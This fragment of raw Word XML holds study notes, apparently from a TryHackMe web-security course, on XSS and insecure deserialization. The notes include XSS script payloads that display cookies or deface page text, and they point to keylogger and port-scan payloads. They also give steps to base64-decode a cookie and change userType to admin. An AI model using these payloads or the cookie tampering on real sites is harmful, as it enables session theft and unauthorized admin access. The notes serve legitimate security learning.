        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Create an alert popup box appear on the page with document cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DFFA3D" w14:textId="78CCBB13" w:rsidR="00D74383" w:rsidRPr="0084205E" w:rsidRDefault="00D74383" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6131BC30" w14:textId="3F3561B6" w:rsidR="00D74383" w:rsidRPr="0084205E" w:rsidRDefault="00D74383" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Change “XSS Playground” to “I am a hacker” by adding a comment and using JS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF25AEE" w14:textId="58FF283B" w:rsidR="00D74383" w:rsidRPr="0084205E" w:rsidRDefault="00D74383" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Inspect Element and Find Code for Specific Piece to be Replaced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB75226" w14:textId="6350D317" w:rsidR="00D74383" w:rsidRPr="0084205E" w:rsidRDefault="00D74383" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>document.querySelector</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>(‘&lt;tag to be edited&gt;).</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>textContent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 'I am a hacker'&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AAE8FC" w14:textId="2FFA06EE" w:rsidR="00E13B68" w:rsidRPr="0084205E" w:rsidRDefault="00750162" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">    XSS Keylogger (http://www.xss-payloads.com/payloads/scripts/simplekeylogger.js.html) - You can log all keystrokes of a user, capturing their password and other sensitive information they type into the webpage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269894E2" w14:textId="3ED9F977" w:rsidR="00750162" w:rsidRPr="0084205E" w:rsidRDefault="00750162" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">    Port scanning (http://www.xss-payloads.com/payloads/scripts/portscanapi.js.html) - A mini local port scanner (more information on this is covered in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>TryHackMe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> XSS room).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B44329B" w14:textId="3E9C34FB" w:rsidR="00750162" w:rsidRPr="0084205E" w:rsidRDefault="00750162" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>XSS-Payloads.com (http://www.xss-payloads.com/) is a website that has XSS related Payloads, Tools, Documentation and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A94586" w14:textId="0061FE58" w:rsidR="00750162" w:rsidRPr="0084205E" w:rsidRDefault="00750162" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>XSS Challenge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A673249" w14:textId="4CB29BF1" w:rsidR="00750162" w:rsidRPr="0084205E" w:rsidRDefault="00E13B68" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Insecure Deserialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B155D8A" w14:textId="6A8822C4" w:rsidR="00E13B68" w:rsidRPr="0084205E" w:rsidRDefault="00E13B68" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Occurs when untrusted data is used to abuse the logic of an application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AAAED8" w14:textId="0DBCBE7E" w:rsidR="00E13B68" w:rsidRPr="0084205E" w:rsidRDefault="00E13B68" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Replacing data processed by an application with malicious code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE4A631" w14:textId="3CAB1337" w:rsidR="00E13B68" w:rsidRPr="0084205E" w:rsidRDefault="00E13B68" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Leverages legitimate serialization and deserialization process used by web applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0CEF8A" w14:textId="2A695745" w:rsidR="00E13B68" w:rsidRPr="0084205E" w:rsidRDefault="00E13B68" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Low exploitability – case-by-case</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2645C803" w14:textId="3685D9CC" w:rsidR="00E13B68" w:rsidRPr="0084205E" w:rsidRDefault="00E13B68" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Exploit extent dependent on hacker skill</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48012EF7" w14:textId="3B9A4DDF" w:rsidR="00E13B68" w:rsidRPr="0084205E" w:rsidRDefault="00E13B68" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>What is vulnerable?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AA389C" w14:textId="1AADAAEC" w:rsidR="00E13B68" w:rsidRPr="0084205E" w:rsidRDefault="00E13B68" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>E-commerce sites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1382E246" w14:textId="503DD060" w:rsidR="00E13B68" w:rsidRPr="0084205E" w:rsidRDefault="00E13B68" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Forums</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DE6E1E" w14:textId="0C847E7D" w:rsidR="00E13B68" w:rsidRPr="0084205E" w:rsidRDefault="00E13B68" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>APIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F54931" w14:textId="7DF35075" w:rsidR="00E13B68" w:rsidRPr="0084205E" w:rsidRDefault="00E13B68" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Application runtimes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A628D17" w14:textId="35713924" w:rsidR="00E13B68" w:rsidRPr="0084205E" w:rsidRDefault="00E13B68" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Insecure Deserialization – Object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFD7C65" w14:textId="391E3A37" w:rsidR="00E13B68" w:rsidRPr="0084205E" w:rsidRDefault="00F031A7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>OOP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AC19B5" w14:textId="20BB0395" w:rsidR="00F031A7" w:rsidRPr="0084205E" w:rsidRDefault="00F031A7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>States and behaviors of objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41852DF7" w14:textId="2D2CB530" w:rsidR="00F031A7" w:rsidRPr="0084205E" w:rsidRDefault="00F031A7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Insecure Deserialization – Deserialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62667C97" w14:textId="693CBCD0" w:rsidR="00F031A7" w:rsidRPr="0084205E" w:rsidRDefault="00F031A7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Serialization is the process of converting objects used in programming into simpler, compatible formatting for transmitting between systems or networks for further processing/storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A247105" w14:textId="4B5DA08E" w:rsidR="00F031A7" w:rsidRPr="0084205E" w:rsidRDefault="00F031A7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Deserialization is the reverse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E5337D" w14:textId="04012AA4" w:rsidR="00F031A7" w:rsidRPr="0084205E" w:rsidRDefault="00F031A7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Plaintext </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> binary for transport; binary </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> plaintext for application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCD7CB1" w14:textId="606C0FA4" w:rsidR="00F031A7" w:rsidRPr="0084205E" w:rsidRDefault="00F031A7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Insecure deserialization occurs when data from an untrusted party gets executed due to lack of filtering/input validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA0FB2B" w14:textId="61834714" w:rsidR="00F031A7" w:rsidRPr="0084205E" w:rsidRDefault="00F031A7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Insecure Deserialization – Cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5A4626" w14:textId="77FA890B" w:rsidR="00F031A7" w:rsidRPr="0084205E" w:rsidRDefault="00F031A7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Expiry timers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61685A30" w14:textId="547F65DC" w:rsidR="00F031A7" w:rsidRPr="0084205E" w:rsidRDefault="00F031A7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Cookie name – required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8A9ED3" w14:textId="7D346372" w:rsidR="00F031A7" w:rsidRPr="0084205E" w:rsidRDefault="00F031A7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Cookie value – plaintext/encoded – required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C30475" w14:textId="40CCC263" w:rsidR="00F031A7" w:rsidRPr="0084205E" w:rsidRDefault="00F031A7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Secure only – only sent over HTTPS – not required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4A2204" w14:textId="66240B76" w:rsidR="00F031A7" w:rsidRPr="0084205E" w:rsidRDefault="00F031A7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Expiry – timestamp </w:t>
      </w:r>
      <w:r w:rsidR="00332E2C" w:rsidRPr="0084205E">
        <w:t>when cookie is removed from browser – not required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD8A96D" w14:textId="17A59E71" w:rsidR="00332E2C" w:rsidRPr="0084205E" w:rsidRDefault="00332E2C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Path – cookie only sent if specified URL is in request – not required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BC1C9B" w14:textId="0EEB003A" w:rsidR="00332E2C" w:rsidRPr="0084205E" w:rsidRDefault="00332E2C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Insecure Deserialization – Cookies Practical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68746332" w14:textId="2F74CB7A" w:rsidR="00332E2C" w:rsidRPr="0084205E" w:rsidRDefault="00332E2C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Inspect element when within profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAED266" w14:textId="25C79866" w:rsidR="00332E2C" w:rsidRPr="0084205E" w:rsidRDefault="00332E2C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Storage tab </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752E3CC5" w14:textId="0E00FF9C" w:rsidR="000E14E7" w:rsidRPr="0084205E" w:rsidRDefault="000E14E7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Check for encoded, base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575AAC6F" w14:textId="53234CE4" w:rsidR="000E14E7" w:rsidRPr="0084205E" w:rsidRDefault="000E14E7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Decode echo ‘&lt;base64 string&gt;’ | base64 --decode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08879E2B" w14:textId="43F62C43" w:rsidR="00332E2C" w:rsidRPr="0084205E" w:rsidRDefault="00332E2C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>userType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – change from user to admin?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560CE44D" w14:textId="0C499A60" w:rsidR="00332E2C" w:rsidRPr="0084205E" w:rsidRDefault="00332E2C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Then navigate to URL /admin</w:t>
      </w:r>
    </w:p>
